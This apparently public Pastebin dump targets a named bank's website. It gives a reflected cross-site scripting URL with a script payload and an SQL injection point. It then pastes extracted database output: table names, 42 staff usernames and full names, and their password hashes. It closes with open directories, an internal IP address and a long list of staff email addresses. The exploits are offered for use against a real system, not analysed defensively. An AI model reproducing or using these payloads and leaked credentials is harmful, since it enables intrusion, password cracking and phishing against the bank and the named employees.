Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- **********************************************************************************************
- [*] Target: www.islamibankbd.com
- [**]Cross-site Scripting:
- http://www.islamibankbd.com/feedback/feedback_action.php?email&subject&body&country=%22%3E%3Cscript%3Ealert%28%22XSS%20vuln%20found%20by%20me%20human%20mind%20cracker%22%29%3C/script%3E
- (work on mozilla firefox)
- [**] SQL injection:
- http://www.islamibankbd.com/branchinfo/branchDetail.php?BrDtlsID=60'
- [****] Information Leaked from their database:
- database: MySQL
- [*]Vuln on: http://www.islamibankbd.com/branchinfo/branchDetail.php?BrDtlsID=60'
- available databases [2]:
- [*] information_schema
- [*] islamidb
- Database: islamidb
- [74 tables]
- +--------------------------+
- | annualreport |
- | ar_cat |
- | area |
- | articles |
- | atm |
- | atm_area |
- | atm_location |
- | audit_committee |
- | board_of_directors |
- | books |
- | branchdtls |
- | branches |
- | chairman_corner |
- | charge_commision |
- | corporate_info |
- | currencyrate |
- | currencyrate0 |
- | deposit_scheme |
- | deposit_scheme_info |
- | dept |
- | disclosure |
- | district |
- | download |
- | dynamicsections |
- | email |
- | eventdetails |
- | eventdetails_11 |
- | eventdetails_111 |
- | events |
- | executive_committee |
- | feb_aof_info |
- | feb_crsp_info |
- | feb_csc_info |
- | feb_nrb_info |
- | feb_rema_info |
- | feb_repa_info |
- | fex_graph |
- | interview |
- | investment |
- | jobcategory |
- | jobdetails |
- | keypersonal |
- | link |
- | link_cat |
- | management |
- | managementdetails |
- | manager_info |
- | md_corner |
- | md_news |
- | md_publication |
- | news |
- | notice |
- | orderby |
- | orderplacement |
- | paidup_capital |
- | personnel |
- | photo_album |
- | price_sensative_headline |
- | privilege |
- | profit_rate |
- | publication |
- | qryjobs |
- | rds_perform_details |
- | rds_perform_heading |
- | shariahcouncil |
- | shariahdetails |
- | sme_info |
- | sme_prd_info |
- | sme_zone |
- | sponsors |
- | sysvalues |
- | userrights |
- | users |
- | video |
- +--------------------------+
- Database: islamidb
- Table: users
- [13 columns]
- +-------------+--------------+
- | Column | Type |
- +-------------+--------------+
- | Address | varchar(50) |
- | BranchName | varchar(50) |
- | Depertment | varchar(50) |
- | Designation | varchar(50) |
- | Email | varchar(50) |
- | FullName | varchar(50) |
- | IsActive | tinyint(4) |
- | Mobile | varchar(50) |
- | Password | varchar(255) |
- | Phone | varchar(50) |
- | UserID | int(11) |
- | UserName | varchar(50) |
- | UserType | char(1) |
- +-------------+--------------+
- Database: islamidb
- Table: users
- [42 entries]
- +------------------+
- | UserName |
- +------------------+
- | atmadmin |
- | atmimran |
- | bcdadmin |
- | bcdraquib |
- | borhan |
- | bpmdadmin |
- | bpmdnizam |
- | bpmdsaiful |
- | bsadmin |
- | bsahashan |
- | bsfoysal |
- | chairmanadmin |
- | chairmanuser |
- | dsd |
- | ecsdadmin |
- | ecsdjahangir |
- | fadadmin |
- | fadshaheduzzaman |
- | hrdabrar |
- | hrdadmin |
- | hrdahsan |
- | hrdmaquddus |
- | ibwadmin |
- | ibwmonir |
- | ictdwebadmin |
- | khademibw |
- | mdsadmin |
- | mdsmohtasim |
- | mkamal |
- | prdadmin |
- | prdhumayan |
- | rcidadmin |
- | rddadmin |
- | rddmashiul |
- | rddthohid |
- | rdsadmin |
- | rdsuser |
- | shaheduzzaman |
- | shareadmin |
- | sharerozaer |
- | shariahadmin |
- | shariahhabib |
- +------------------+
- Database: islamidb
- Table: users
- [42 entries]
- +-------------------------------+
- | FullName |
- +-------------------------------+
- | Admin of HRD |
- | Ahsan Habib |
- | Habibur Rahman |
- | Humayan Rashid |
- | Imran |
- | Ismail |
- | Jahangir Hossain |
- | Md. Atiqur Rahman khan Khadem |
- | Md. Borhan Uddin |
- | Md. Mashiul Alam |
- | Md. Mostofa Kamal |
- | Mohammd Thohidul Islam |
- | Muhammad Abdul Quddus |
- | Omar Foysal |
- | Qazi Mohammed Shamsul Abrar |
- | Rozaer Hossain |
- | S M Abdur Raquib |
- | Saiful Islam |
- | Shaheduzzaman |
- | Super Admin |
- |_______________________________
- Database: islamidb
- Table: users
- [42 entries]
- +----------------------------------+
- | Password |
- +----------------------------------+
- | 01e8565004e20ebaaee5d1e948cc0f03 |
- | 04dcef1b1d1ffff2a2c1f6f31e42348a |
- | 0d308e5cfbb51143225b884c2d56167e |
- | 0ed377bde3c3a6a3b3c9b8f49c81bcac |
- | 119cbed0296edd3415f73ca21d695eb4 |
- | 13cf6dd79b3e7d7d398f11a567a0a1b5 |
- | 178b0c400e3cbc03418ee64e7af71b6e |
- | 2651cea9b74c51aacdbcc1396ce5bfb7 |
- | 3d3993a6ece38d0c10b155d5facf78e7 |
- | 3eeb8d98c5dba5919eaed3f93bc317e6 |
- | 3fb85c9f03577600bc8ba6e2e25a44d5 |
- | 46f1eeae56bdf1077e1890cf8c8384a3 |
- | 48cda072801bb304a08aaa19cae8ece6 |
- | 4c1f0b5771136bf504f8d72144fc0972 |
- | 5135cebb53ab8a028f9d16d48ca9f5f5 |
- | 6013ee7dc437d4b10b211110ebeb5dc4 |
- | 639aa761eb8cdaaf132c98460c3a92be |
- | 641e4550176313cfcb7004dc6657c54c |
- | 731c4cece807f681524eeb3c00c075c8 |
- | 738a639acd1502c515d2ba9a980162e8 |
- | 7e242f8c51fdb0b1a754bcdec21d0532 |
- | 806938e17a140d0a2847c6d4a7e88e8c |
- | 8336f298fed5901d2c58c4c3a0be0522 |
- | 86d7ffa824672126bd183a8961d95a1e |
- | 8e099fb1fd7804e63e29ca180853f1a3 |
- | 9e044b89f318c8848d18ad0f8a64d309 |
- | 9f6b071e1e1c75a380a99972fd1d6c87 |
- | a06ea6415499e6fc813cdb756da9fdb6 |
- | b31d1d300bd4d9438a59169c08535682 |
- | bd06b23acb9d8f84149500333cc1c7cc |
- | bd596577eefdf3a60b314512035d7de8 |
- | bed407e0a32fdd46b71722c11991d9c3 |
- | cca35a0265721f5ab431821a745056af |
- | d6dec0fde9d68bb607d25b84d45059f0 |
- | da1f2fbf9b96c7160869c785b8de4bd6 |
- | da7c5f47b4c492545aa55ec5887989a1 |
- | db502e13cc0ad9b22440223c095bcdaf |
- | e2e796c8d2f15e6eeae1498e063996d1 |
- | ecdc03a40c52f1a387cb44ddf5740e5d |
- | f099cd5a70853ec7de964fdbb7027bb9 |
- | f28d90f403abe8c509aca6bd73930e8f |
- | f3c94f7cece18ac86ede31265f24a2e7 |
- +----------------------------------+
- [**] Directory Listing Enabled:
- Directory listings allow attackers to get better understandings about the server and the application structure. In some situations directory listings may reveal resources which are not supposed to be known.
- [-]solution: Disable directory listings.
- url: http://www.islamibankbd.com/upload_dir/photo_album/
- url: http://www.islamibankbd.com/upload_dir/newsimages/
- url: http://www.islamibankbd.com/feedback/
- url: http://www.islamibankbd.com/upload_dir/photo_album/thumb/
- url: http://www.islamibankbd.com/upload_dir/fex_graph/
- url: http://www.islamibankbd.com/upload_dir/fex_graph/sym00/
- url: http://www.islamibankbd.com/feedback/images/
- [**] IP Disclosure:
- The server or application disclosed internal network information. This information could be used by attackers to make an educated guess about the internal or external network topology. Leaked IP addresses could be used as a stepping-stone to more complex attacks.
- solution: Ensure that sensitive information such as internal or external IP addresses is safely guarded. Unless there is a good, prevent the disclosure of network information.
- ip: 192.168.0.69
- [**] Email leaked:
- email: info@islamibankbd.com
- email: hocc@islamibankbd.com
- email: uttara@islamibankbd.com
- email: agrabad@islamibankbd.com
- email: ibblac@bttb.net.bd
- email: dhakacentral@islamibankbd.com
- email: dhanmondi@islamibankbd.com
- email: elephantroad@islamibankbd.com
- email: farmgate@islamibankbd.com
- email: idbbhaban@islamibankbd.com
- email: kawran@islamibankbd.com
- email: khilgaon@islamibankbd.com
- email: mogbazar@islamibankbd.com
- email: motijheel@islamibankbd.com
- email: mouchak@islamibankbd.com
- email: newmarket@islamibankbd.com
- email: paltan@islamibankbd.com
- email: panthapath@islamibankbd.com
- email: ramna@islamibankbd.com
- email: rampura@islamibankbd.com
- email: viproad@islamibankbd.com
- email: mannan@islamibankbd.com
- email: shaque@islamibankbd.com
- email: mhr@islamibankbd.com
- email: mnislam@islamibankbd.com
- email: hrbhuiyan@islamibankbd.com
- email: sadeq@islamibankbd.com
- email: imrislam@yahoo.com
- email: mdnajibur@gmail.com
- email: kabir0136@islamibankbd.com
- email: dhakanorth@islamibankbd.com
- email: dhakasouth@islamibankbd.com
- email: cmb@islamibankbd.com
- email: ctgnorth@islamibankbd.com
- email: nasir106@islamibankbd.com
- email: moula131@yahoo.com
- email: khatunganj@islamibankbd.com
- email: abdulnaser@yahoo.com
- email: admin.portal@islamibankbd.com
- email: majhar@islamibankbd.com
- email: barisalzone@islamibankbd.com
- email: barguna@islamibankbd.com
- email: barisal@islamibankbd.com
- email: Bhandaria@islamibankbd.com
- email: bhola@islamibankbd.com
- email: charfashion@islamibankbd.com
- email: damodya@islamibankbd.com
- email: faridpur@islamibankbd.com
- email: gopalgonj@islamibankbd.com
- email: hatkhola@islamibankbd.com
- email: jhalokathi@islamibankbd.com
- email: madaripur@islamibankbd.com
- email: miarhat@islamibankbd.com
- email: naria@islamibankbd.com
- email: patuakhali@islamibankbd.com
- email: pirojpur@islamibankbd.com
- email: rajbari@islamibankbd.com
- email: shariatpur@islamibankbd.com
- email: takerhat@islamibankbd.com
- email: torki@islamibankbd.com
- email: bograzone@islamibankbd.com
- email: baragola@islamibankbd.com
- email: belkuchi@islamibankbd.com
- email: bogra@islamibankbd.com
- email: joypurhat@islamibankbd.com
- email: mohadevpur@islamibankbd.com
- email: naogaon@islamibankbd.com
- email: nazipur@islamibankbd.com
- email: shapahar@islamibankbd.com
- email: sirajganj@islamibankbd.com
- email: ctgzone@islamibankbd.com
- email: potenga@colbd.com
- email: bariyarhat@islamibankbd.com
- email: dewanhat@islamibankbd.com
- email: fatikchari@islamibankbd.com
- email: halishahar@islamibankbd.com
- email: hathazari@islamibankbd.com
- [****] Picture:
- http://www.imagup.com/data/1166122796.html
Add Comment
Please, Sign In to add comment